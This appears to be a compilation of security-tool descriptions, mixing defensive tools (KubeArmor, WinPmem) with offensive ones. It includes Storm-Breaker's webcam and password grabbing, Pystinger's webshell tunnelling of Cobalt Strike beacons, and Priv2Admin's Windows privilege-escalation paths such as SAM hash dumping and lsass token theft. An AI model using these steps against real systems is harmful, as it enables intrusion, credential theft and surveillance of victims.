
Nginxpwner - Tool to look for common Nginx misconfigurations and vulnerabilities


Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulnerabilities.


Install:
cd /opt
git clone https://github.com/stark0de/nginxpwner
cd nginxpwner
chmod +x install.sh
./install.sh

Usage:
In Burp's Target tab, select the host, right-click, choose "Copy URLs in this host", and paste the URLs into a file.

cat urllist | unfurl paths | cut -d"/" -f2-3 | sort -u > /tmp/pathlist

Or get the list of paths you already discovered in the application in some other way. Note: the paths should not start with /

Finally:

python3 nginxpwner.py https://example.com /tmp/pathlist

Notes:

The tool performs the following checks:

-Gets the Nginx version, reports whether it is outdated, and looks up possible exploits using searchsploit

-Runs an Nginx-specific wordlist against the target via gobuster

-Checks if it is vulnerable to CRLF injection via the common misconfiguration of using $uri in redirects (see the sketch after this list)

-Checks for CRLF in all of the paths provided

-Checks if the PURGE HTTP method is available from the outside

-Checks for variable leakage misconfiguration

-Checks for path traversal vulnerabilities via merge_slashes set to off

-Tests for differences in the length of requests when using hop-by-hop headers (ex: X-Forwarded-Host)

-Uses Kyubi to test for path traversal vulnerabilities via misconfigured alias

-Tests for 401/403 bypass using X-Accel-Redirect

-Shows the payload to check for Raw backend reading response misconfiguration

-Checks if the site uses PHP and suggests some nginx-specific tests for PHP sites

-Tests for the common integer overflow vulnerability in Nginx's range filter module (CVE-2017-7529)
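For intuition, the CRLF check above boils down to requesting a path containing encoded CR/LF characters and seeing whether they end up reflected unescaped in a response header. A minimal sketch in Python (the URL is a placeholder, and this illustrates the idea rather than nginxpwner's exact code):

import requests

# Hypothetical target: a redirect built from $uri decodes %0d%0a,
# letting an attacker smuggle a Set-Cookie header into the response.
url = "https://example.com/%0d%0aSet-Cookie:crlf=injected"
resp = requests.get(url, allow_redirects=False)
if "crlf=injected" in resp.headers.get("Set-Cookie", ""):
    print("Likely vulnerable to CRLF injection via $uri")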

The tool uses the Server header in the response to perform some of the tests. Some other platforms built on Nginx, such as Centminmod, OpenResty, Pantheon or Tengine, don't return that header. In that case, please use nginx-pwner-no-server-header.py with the same parameters as the main script.

Also, for the exploit search to run correctly, you should run searchsploit -u in Kali from time to time.

The tool does not check for web cache poisoning/deception vulnerabilities or request smuggling; you should test those with tools dedicated to those vulnerabilities. NginxPwner is mainly focused on misconfigurations that developers may have introduced into nginx.conf without being aware of them.

Credit to shibli2700 for his awesome tool Kyubi (https://github.com/shibli2700/Kyubi) and to all the contributors of gobuster. Credits also to Detectify, which actually discovered many of these misconfigurations in Nginx.




Storm-Breaker - Tool Social Engineering (Access Webcam, Microphone, OS Password Grabber And Location Finder) With Ngrok


A social engineering tool (webcam access, microphone access, OS password grabbing and location finding) using Ngrok.



Features:
  • Get Device Information Without Any Permissions
  • Access Location [SMARTPHONES]
  • OS Password Grabber [WIN-10]
  • Access Webcam
  • Access Microphone



Operating Systems Tested

Installation On Kali Linux
$ git clone https://github.com/ultrasecurity/Storm-Breaker
$ cd Storm-Breaker
$ sudo bash linux-installer.sh
$ python3 -m pip install -r requirments.txt
$ sudo python3 Storm-Breaker.py


WinPmem - The Multi-Platform Memory Acquisition Tool

The WinPmem memory acquisition driver and userspace

WinPmem has been the default open source memory acquisition driver for Windows for a long time. It used to live in the Rekall project, but has recently been separated into its own repository.


Copyright

This code was originally developed within Google but was released under the Apache License.


Description

WinPmem is a physical memory acquisition tool with the following features:

  • Open source

  • Support for WinXP to Win10, x86 and x64. The WDK7600 can be used to include WinXP support. By default, the provided WinPmem executables are compiled with WDK10, supporting Win7 to Win10 and featuring more modern code.

  • Three different independent methods to create a memory dump. One method should always work even when faced with kernel mode rootkits.

  • Raw memory dump image support.

  • A read device interface is used instead of writing the image from the kernel like some other imagers. This allows us to have a complex userspace imager (e.g., copying across the network, hashing, etc.), as well as to run analysis on the live system (e.g., it can be run directly on the device).

The files in this directory (Including the WinPmem sources and signed binaries), are available under the following license: Apache License, Version 2.0


How to use

There are two WinPmem executables: winpmem_mini_x86.exe and winpmem_mini_x64.exe. Both versions contain both drivers (32 and 64 bit versions).

The mini in the binary name refers to this imager being a plain, simple imager: it can only produce images in RAW format. In the past we released a WinPmem imager based on AFF4, but that one is yet to be updated to the new driver. Please let us know if you need the AFF4-based imager.


The Python acquisition tool winpmem.py

The Python program is currently under construction, but works as a demonstration of how one can use the imager from Python.


winpmem_mini_x64.exe (standalone executable)

This program is easiest to use for incident response since it requires no other dependencies than the executable itself. The program will load the correct driver (32 bit or 64 bit) automatically and is self-contained.


Examples:

winpmem_mini_x64.exe physmem.raw

Writes a raw image to physmem.raw using the default method of acquisition.

winpmem_mini_x64.exe

Invokes the usage print / short manual.

To acquire a raw image using specifically the MmMapIoSpace method:

winpmem.exe -1 myimage.raw

The driver will be automatically unloaded after the image is acquired!
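Before moving an image off the box, it is good practice to record its hash; a small Python sketch (physmem.raw is the filename from the first example above):

import hashlib

# Hash the acquired image in chunks so large dumps don't exhaust RAM.
sha256 = hashlib.sha256()
with open("physmem.raw", "rb") as f:
    for chunk in iter(lambda: f.read(1 << 20), b""):
        sha256.update(chunk)
print(sha256.hexdigest())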


Experimental write support

The WinPmem source code supports writing to memory as well as reading. This capability is a great learning tool since many rootkit hiding techniques can be emulated by writing to memory directly.

This functionality should be used with extreme caution!

NOTE: Since this is a rather dangerous capability, the signed binary drivers have write support disabled. You can rebuild the drivers to produce test-signed binaries if you want to use this feature. The unsigned binaries (really self-signed with a test certificate) cannot load on a regular system due to being test-signed, but you can allow them to be loaded on a test system by issuing (see https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option):

Bcdedit.exe -set TESTSIGNING ON

and reboot. You will see a small "Test Mode" text on the desktop to remind you that this machine is configured for test signed drivers.

Additionally, write support must also be enabled at load time:

winpmem.exe -w -l

This will load the drivers and turn on write support.


Acknowledgments

This project would also not be possible without support from the wider DFIR community:

  • We would like to thank Emre Tinaztepe and Mehmet GÖKSU at Binalyze.

Our open source contributors:

  • Viviane Zwanger
  • Mike Cohen


Duplicut - Remove Duplicates From MASSIVE Wordlist, Without Sorting It (For Dictionary-Based Password Cracking)


Quickly dedupe massive wordlists, without changing the order 

Created by nil0x42 and contributors

Overview

Modern password wordlist creation usually implies concatenating multiple data sources.

Ideally, the most probable passwords should stand at the start of the wordlist, so the most common passwords are cracked instantly.

With existing dedupe tools you are forced to choose between preserving the order and handling massive wordlists.

Unfortunately, wordlist creation requires both:



So I wrote duplicut in highly optimized C to address this very specific need.


Quick start

git clone https://github.com/nil0x42/duplicut
cd duplicut/ && make
./duplicut wordlist.txt -o clean-wordlist.txt

Options


 

  • Features:

    • Handle massive wordlists, even those whose size exceeds available RAM
    • Filter lines by max length (-l option)
    • Can remove lines containing non-printable ASCII chars (-p option)
    • Press any key to show program status at runtime.
  • Implementation:

    • Written in pure C code, designed to be fast
    • Compressed hashmap items on 64 bit platforms
    • Multithreading support
    • [TODO]: Use huge memory pages to increase performance
  • Limitations:

    • Any line longer than 255 chars is ignored
    • Heavily tested on Linux x64, mostly untested on other platforms.

Technical Details

1- Memory optimized:

A uint64 is enough to index lines in the hashmap, by packing size information into the pointer's extra bits.
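A toy illustration of the packing idea (Python, not duplicut's actual C internals): on 64-bit platforms a user-space pointer does not need all 64 bits, so the line's length can ride along in the spare high bits of the same word:

SIZE_BITS = 8                 # duplicut ignores lines over 255 chars, so 8 bits suffice
PTR_MASK = (1 << 56) - 1      # low 56 bits hold the pointer

def pack(ptr, size):
    # Store the line length in the top 8 bits of a 64-bit word.
    return (size << 56) | (ptr & PTR_MASK)

def unpack(word):
    return word & PTR_MASK, word >> 56

assert unpack(pack(0x7f00deadbeef, 42)) == (0x7f00deadbeef, 42)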


2- Massive file handling:

If the whole file can't fit in memory, it is split into n virtual chunks, then each chunk is tested against the following chunks.

So the complexity is equal to the (n-1)th triangle number.
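Concretely, each chunk is compared against every later chunk, so with n chunks there are n*(n-1)/2 chunk-pair passes; a quick sanity check in Python:

from itertools import combinations

n = 5  # number of virtual chunks (illustrative)
passes = len(list(combinations(range(n), 2)))
assert passes == n * (n - 1) // 2  # 10 passes for 5 chunks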



Troubleshooting

If you find a bug, or something doesn't work as expected, please compile duplicut in debug mode and post an issue with the output attached:

# debug level can be from 1 to 4
make debug level=1
./duplicut [OPTIONS] 2>&1 | tee /tmp/duplicut-debug.log


Evasor - A Tool To Be Used In Post Exploitation Phase For Blue And Red Teams To Bypass APPLICATIONCONTROL Policies


Evasor is an automated security assessment tool that locates existing executables on the Windows operating system which can be used to bypass Application Control rules. It is easy to use, quick, saves time and is fully automated, generating a report for you that includes descriptions, screenshots and mitigation suggestions. It suits both blue and red teams in the post-exploitation phase of an assessment.


Requirements
  • Windows OS.
  • Visual studio 2017 installed.

Usage instructions

Download the Evasor project and compile it. Make sure to exclude the App.config file from the project's reference tree.


 

Run Evasor.exe from the bin folder and choose a numeric option from the following:



  1. Locating executable files that can be used to bypass Application Control
  • Retrieves the relative paths of all running processes
  • Checks whether each process (executable file) is vulnerable to DLL injection by:
    1. Running the "MavInject" Microsoft component from the path C:\Windows\System32\mavinject.exe with default parameters.
    2. Checking the exit code of the MavInject execution; if the process exited normally, the process is vulnerable to DLL injection and can be used to bypass Application Control.
  2. Locating processes that are vulnerable to DLL hijacking
  • Retrieves all running processes
  • For each running process:
    1. Retrieves the loaded process modules
    2. Checks whether there is permission to write data into the directory of the running process, by creating an empty file with the name of a loaded module (DLL) or overwriting an existing module file in the process directory (see the sketch after this list).
    3. If the write operation succeeds, the process is likely vulnerable to DLL hijacking.
  3. Locating potentially hijackable resource files
  • Searches for specific files on the computer by their extension.
  • Tries to move the files elsewhere in order to validate that they can be replaced and are therefore potentially vulnerable to resource hijacking.
  • Extensions: xml, config, json, bat, cmd, ps1, vbs, ini, js, exe, dll, msi, yaml, lib, inf, reg, log, htm, hta, sys, rsp
  4. Generating an automatic assessment report (Word document) that includes a description of the tests and the screenshots taken.
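The write-permission test in step 2 of the DLL hijacking check boils down to attempting to create a file in each process's directory. A rough Python equivalent of that single check (Evasor itself is C#; the third-party psutil module is an assumption here):

import os
import psutil  # assumption: pip install psutil

def writable_process_dirs():
    # Try to drop a probe file next to each running executable.
    hits = set()
    for proc in psutil.process_iter(['exe']):
        exe = proc.info.get('exe')
        if not exe:
            continue
        probe = os.path.join(os.path.dirname(exe), 'hijack_probe.dll')
        try:
            with open(probe, 'w'):
                pass
            os.remove(probe)
            hits.add(os.path.dirname(exe))  # writable: potential DLL hijack
        except OSError:
            pass  # no write access: not hijackable this way
    return hits

print(writable_process_dirs())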

Contributing

We welcome contributions of all kinds to this repository. For instructions on how to get started and descriptions of our development workflows, please see our contributing guide.


Share Your Thoughts And Feedback

For more comments, suggestions or questions, you can contact Arik Kublanov from CyberArk Labs. You can find more projects developed by us at https://github.com/cyberark/.


Notes
  • The original code developed and used internally at CyberArk Labs performs full automation and exploitation of the informative results.
  • The original code contains parts for activation and exploitation, but we removed them here.
  • The files under the DLLs folder are empty and do not contain any exploitation code; they are there for the cyber security community's red and blue teams to implement according to their own needs, and can serve as a starting point for their assessment objectives.


LibAFL - Advanced Fuzzing Library - Slot Your Fuzzer Together In Rust! Scales Across Cores And Machines. For Windows, Android, MacOS, Linux, No_Std, ...

Advanced Fuzzing Library - Slot your own fuzzers together and extend their features using Rust.

LibAFL is written and maintained by Andrea Fioraldi andreafioraldi@gmail.com and Dominik Maier mail@dmnk.co.


Why LibAFL?

LibAFL gives you many of the benefits of an off-the-shelf fuzzer, while being completely customizable. Some highlight features currently include:

  • fast: We do everything we can at compile time, keeping runtime overhead minimal. Users reach 120k execs/sec in frida-mode on a phone (using all cores).
  • scalable: Low Level Message Passing, LLMP for short, allows LibAFL to scale almost linearly over cores, and via TCP to multiple machines soon!
  • adaptable: You can replace each part of LibAFL. For example, BytesInput is just one potential form of input: feel free to add an AST-based input for structured fuzzing, and more.
  • multi platform: LibAFL was confirmed to work on Windows, MacOS, Linux, and Android on x86_64 and aarch64. LibAFL can be built in no_std mode to inject LibAFL into obscure targets like embedded devices and hypervisors.
  • bring your own target: We support binary-only modes, like Frida-Mode, as well as multiple compilation passes for source-based instrumentation. Of course it's easy to add custom instrumentation backends.

Overview

LibAFL is a collection of reusable pieces of fuzzers, written in Rust. It is fast, multi-platform, no_std compatible, and scales over cores and machines.

It offers a main crate providing building blocks for custom fuzzers (libafl), a library containing common code that can be used for target instrumentation (libafl_targets), and a library providing facilities to wrap compilers (libafl_cc).

LibAFL offers integrations with popular instrumentation frameworks. At the moment, the supported backends are:


Getting started
  1. Install the Rust development language. We highly recommend not using your Linux distribution's package, as it is likely outdated; rather, install Rust directly. Instructions can be found here.

  2. Clone the LibAFL repository with

git clone https://github.com/AFLplusplus/LibAFL

If you want to get the latest and greatest features,

git checkout dev

Build the library using

cargo build --release
  3. Build the API documentation with
cargo doc
  4. Browse the LibAFL book (WIP!) with (requires mdbook)
cd docs && mdbook serve

We collect all example fuzzers in ./fuzzers. Be sure to read their documentation (and source), this is the natural way to get started!

The best-tested fuzzer is ./fuzzers/libfuzzer_libpng, a multicore libfuzzer-like fuzzer using LibAFL for a libpng harness.


Resources

Contributing

Check the TODO.md file for features that we plan to support.

For bugs, feel free to open issues or contact us directly. Thank you for your support. <3



Pystinger - Bypass Firewall For Traffic Forwarding Using Webshell

Pystinger implements SOCKS4 proxying and port mapping through a webshell.

It can be used directly by Metasploit Framework, Viper, or Cobalt Strike to bring sessions online.

Pystinger is developed in Python, and currently supports three proxy scripts: PHP, JSP(X) and ASPX.


Usage

Suppose the domain name of the server is http://example.com:8080 and the intranet IP address of the server is 192.168.3.11.


SOCK4 Proxy
  • Upload proxy.jsp to the target server and ensure that http://example.com:8080/proxy.jsp is accessible; the page should return UTF-8
  • Upload stinger_server.exe to the target server, then run start D:/XXX/stinger_server.exe from AntSword to start the pystinger server

Don't run D:/xxx/stinger_server.exe directly; it will cause a TCP disconnection

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • You will see the following output:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • You have now started a SOCKS4a proxy on VPS 127.0.0.1:60000 for the intranet of example.com.
  • The target server's (example.com) 127.0.0.1:60020 has now been mapped to the VPS's 127.0.0.1:60020
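Any SOCKS4-capable client can now reach the intranet through 127.0.0.1:60000; for example, with Python requests (PySocks, installed via requests[socks], is an assumption):

import requests  # pip install requests[socks]

proxies = {
    "http": "socks4://127.0.0.1:60000",
    "https": "socks4://127.0.0.1:60000",
}
# 192.168.3.11 is the intranet address from the scenario above.
r = requests.get("http://192.168.3.11", proxies=proxies, timeout=10)
print(r.status_code)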

Cobalt Strike beacon online for a single target
  • Upload proxy.jsp to the target server and ensure that http://example.com:8080/proxy.jsp is accessible; the page should return UTF-8
  • Upload stinger_server.exe to the target server, then run start D:/XXX/stinger_server.exe from AntSword to start the pystinger server

Don't run D:/xxx/stinger_server.exe directly; it will cause a TCP disconnection

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • You will see the following output:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Add a listener in Cobalt Strike: the listener port is 60020 (the Handler/LISTEN port in the RAT Config section of the output), and the listener address is 127.0.0.1
  • Generate the payload, upload it to the target and run it.

Cobalt Strike beacon online for multiple targets
  • Upload proxy.jsp to the target server and ensure that http://example.com:8080/proxy.jsp is accessible; the page should return UTF-8
  • Upload stinger_server.exe to the target server, then run start D:/XXX/stinger_server.exe 192.168.3.11 from AntSword to start the pystinger server (192.168.3.11 is the intranet IP address of the target)

192.168.3.11 can be changed to 0.0.0.0

  • Run ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 on your VPS
  • You will see the following output:
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Add a listener in Cobalt Strike: the listener port is 60020 (the Handler/LISTEN port in the RAT Config section of the output), and the listener address is 192.168.3.11
  • Generate the payload, upload it to the target and run it.
  • When moving laterally to other hosts, you can point the payload at 192.168.3.11:60020 to bring the beacon online

Custom header and proxy
  • If the webshell needs a cookie or authorization to be configured, the request headers can be set through the --header parameter: --header "Authorization: XXXXXX,Cookie: XXXXX"

  • If the webshell needs to be accessed through a proxy, you can set the proxy with --proxy: --proxy "socks5:127.0.0.1:1081"


Related tools

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna


Tested

stinger_server\stinger_client
  • windows
  • linux

proxy.jsp(x)/php/aspx
  • php7.2
  • tomcat7.0
  • iis8.0

Update log

2.0 Update time: 2019-09-29

  • Socks4 proxy service moves to client

2.1 Update time: 2020-01-07



Botkube - An App That Helps You Monitor Your Kubernetes Cluster, Debug Critical Deployments & Gives Recommendations For Standard Practices

For complete documentation visit www.botkube.io

BotKube integration with Slack, Mattermost or Microsoft Teams helps you monitor your Kubernetes cluster, debug critical deployments and get recommendations for standard practices by running checks on the Kubernetes resources. You can also ask BotKube to execute kubectl commands on the k8s cluster, which helps with debugging an application or the cluster.


Hacktoberfest 2020

BotKube is participating in Hacktoberfest 2020. We are giving some really cool swags to our contributors, learn more at - https://www.infracloud.io/blogs/infracloud-joins-hacktoberfest-2020/.


Getting started

Please follow this for a complete BotKube installation guide.


Architecture



  • Informer Controller: Registers informers to kube-apiserver to watch events on the configured k8s resources. It forwards the incoming k8s event to the Event Manager.
  • Event Manager: Extracts required fields from k8s event object and creates a new BotKube event struct. It passes BotKube event struct to the Filter Engine.
  • Filter Engine: Takes the k8s object and BotKube event struct and runs Filters on them. Each filter runs some validations on the k8s object and modifies the messages in the BotKube event struct if required.
  • Event Notifier: Finally, notifier sends BotKube event over the configured communication channel.
  • Bot Interface: Bot interface takes care of authenticating and managing connections with communication mediums like Slack, Mattermost, Microsoft Teams and reads/sends messages from/to them.
  • Executor: Executes BotKube or kubectl command and sends back the result to the Bot interface.

Visit www.botkube.io for Configuration, Usage and Examples.




KubeArmor - Container-aware Runtime Security Enforcement System


Introduction to KubeArmor

KubeArmor is a container-aware runtime security enforcement system that restricts the behavior (such as process execution, file access, networking operation, and resource utilization) of containers at the system level.

KubeArmor operates with Linux security modules (LSMs), meaning that it can work on top of any Linux platform (such as Alpine, Ubuntu, and Container-Optimized OS from Google) if Linux security modules (e.g., AppArmor, SELinux, or KRSI) are enabled in the Linux kernel. KubeArmor will use the appropriate LSMs to enforce the required policies.


KubeArmor is designed for Kubernetes environments; thus, operators only need to define security policies and apply them to Kubernetes. KubeArmor will then automatically detect changes in security policies from Kubernetes and enforce them on the corresponding containers without any human intervention.

If there are any violations against security policies, KubeArmor immediately generates audit logs with container identities. If operators have any logging systems, it automatically sends audit logs to their systems as well.



Functionality Overview
  • Restrict the behavior of containers at the system level

Traditional container security solutions (e.g., Cilium) mostly protect containers by determining their inter-container relations (i.e., service flows) at the network level. In contrast, KubeArmor prevents malicious or unknown behaviors in containers by specifying their desired actions (e.g., a specific process should only be allowed to access a sensitive file).

For this, KubeArmor provides the ability to filter process executions, file accesses, resource utilization, and even network operations inside containers at the system level.

  • Enforce security policies to containers in runtime

In general, security policies (e.g., Seccomp and AppArmor profiles) are statically defined within pod definitions for Kubernetes, and they are applied to containers at creation time. The security policies cannot then be updated at runtime.

To avoid this problem, KubeArmor maintains security policies separately, which means that security policies are no longer tightly coupled with containers. KubeArmor then applies the security policies directly to the Linux security modules (LSMs) for each container, according to the labels of the given containers and security policies.

  • Produce container-aware audit logs

LSMs do not have any container-related information; thus, they generate audit logs only based on system metadata (e.g., User ID, Group ID, and process ID). Therefore, it is hard to figure out what containers cause policy violations.

To address this problem, KubeArmor uses an eBPF-based system monitor, which keeps track of process life cycles in containers, and converts system metadata to container identities when LSMs generate audit logs for any policy violations from containers.

  • Provide easy-to-use semantics for policy definitions

KubeArmor provides the ability to monitor the life cycles of containers' processes and take policy decisions based on them. In general, it is much easier to deny a specific action but it is more difficult to allow only specific actions while denying all. KubeArmor manages internal complexities associated with handling such policy decisions and provides easy semantics towards policy language.

  • Support network security enforcement among containers

KubeArmor aims to protect containers themselves rather than interactions among containers. However, a user can add KubeArmor policies that apply at the level of network system calls (e.g., bind(), listen(), accept(), and connect()), thus somewhat controlling interactions among containers.


Getting Started

Please take a look at the following documents.

  1. Deployment Guide
  2. Security Policy Specification for Containers
  3. Security Policy Examples for Containers
  4. Security Policy Specification for Nodes (Hosts)
  5. Security Policy Examples for Nodes (Hosts)

If you want to make a contribution, please refer to the following documents too.

  1. Contribution Guide
  2. Development Guide
  3. Technical Roadmap

Community
  • Slack

    Please join the KubeArmor Slack channel to communicate with KubeArmor developers and other users. We always welcome having a discussion about the problems that you face during the use of KubeArmor.



Priv2Admin - Exploitation Paths Allowing You To (Mis)Use The Windows Privileges To Elevate Your Rights Within The OS


The idea is to "translate" Windows OS privileges to a path leading to:

  1. administrator,
  2. integrity and/or confidentiality threat,
  3. availability threat,
  4. just a mess.

Privileges are listed and explained at: https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants


If the goal can be achieved multiple ways, the priority is

  1. Using built-in commands
  2. Using PowerShell (only if a working script exists)
  3. Using non-OS tools
  4. Using any other method

You can check your own privileges with whoami /priv. Disabled privileges are as good as enabled ones; the only thing that matters is whether the privilege appears in the list at all.
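If you want to collect those privilege names programmatically, parsing the whoami /priv output is enough; a minimal sketch:

import subprocess

# Grab the first column (privilege names) from `whoami /priv`.
out = subprocess.run(["whoami", "/priv"], capture_output=True, text=True).stdout
privs = [line.split()[0] for line in out.splitlines() if line.startswith("Se")]
print(privs)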

Note 1: Whenever the attack path ends with a token creation, you can assume the next step is to create a new process using that token and then take control of the OS.

Note 2:
a. For calling NtQuerySystemInformation()/ZwQuerySystemInformation() directly, you can find the required privileges here.
b. For NtSetSystemInformation()/ZwSetSystemInformation(), the required privileges are listed here.

Note 3: I am focusing on the OS only. If a privilege works in AD but not in the OS itself, I am describing it as not used in the OS. It would be nice if someone digs deeper into AD-oriented scenarios.

Feel free to contribute and/or discuss presented ideas.

Each privilege is listed as Privilege (Impact, Tool), followed by the execution path and remarks.

SeAssignPrimaryToken (Admin, 3rd party tool)
Execution path: "It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe."
Remarks: Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon.

SeAudit (Threat, 3rd party tool)
Execution path: Write events to the Security event log to fool auditing or to overwrite old events.
Remarks: Writing own events is possible with the Authz Report Security Event API.

SeBackup (Admin, 3rd party tool)
Execution path:
1. Back up the HKLM\SAM and HKLM\SYSTEM registry hives
2. Extract the local account hashes from the SAM database
3. Pass-the-Hash as a member of the local Administrators group
Remarks: Alternatively, can be used to read sensitive files. For more information, refer to the SeBackupPrivilege file.

SeChangeNotify (None)
Remarks: Privilege held by everyone. Revoking it may make the OS (Windows Server 2019) unbootable.

SeCreateGlobal: ???

SeCreatePagefile (None, built-in commands)
Execution path: Create hiberfil.sys, read it offline, look for sensitive data.
Remarks: Requires offline access, which leads to admin rights anyway.

SeCreatePermanent: ???

SeCreateSymbolicLink: ???

SeCreateToken (Admin, 3rd party tool)
Execution path: Create an arbitrary token including local admin rights with NtCreateToken.

SeDebug (Admin, PowerShell)
Execution path: Duplicate the lsass.exe token.
Remarks: Script to be found at FuzzySecurity.

SeDelegateSessionUserImpersonate: ???

SeEnableDelegation (None)
Remarks: The privilege is not used in the Windows OS.

SeImpersonate (Admin, 3rd party tool)
Execution path: Tools from the Potato family (potato.exe, rottenpotato.exe and juicypotato.exe), RogueWinRM, etc.
Remarks: Similarly to SeAssignPrimaryToken, allows by design to create a process under the security context of another user (using a handle to a token of said user). Multiple tools and techniques may be used to obtain the required token.

SeIncreaseBasePriority (Availability, built-in commands)
Execution path: start /realtime SomeCpuIntensiveApp.exe
Remarks: May be more interesting on servers.

SeIncreaseQuota (Availability, 3rd party tool)
Execution path: Change CPU, memory, and cache limits to values making the OS unbootable.
Remarks: Quotas are not checked in safe mode, which makes repair relatively easy. The same privilege is used for managing registry quotas.

SeIncreaseWorkingSet (None)
Remarks: Privilege held by everyone. Checked when calling fine-tuning memory management functions.

SeLoadDriver (Admin, 3rd party tool)
Execution path:
1. Load a buggy kernel driver such as szkg64.sys
2. Exploit the driver vulnerability
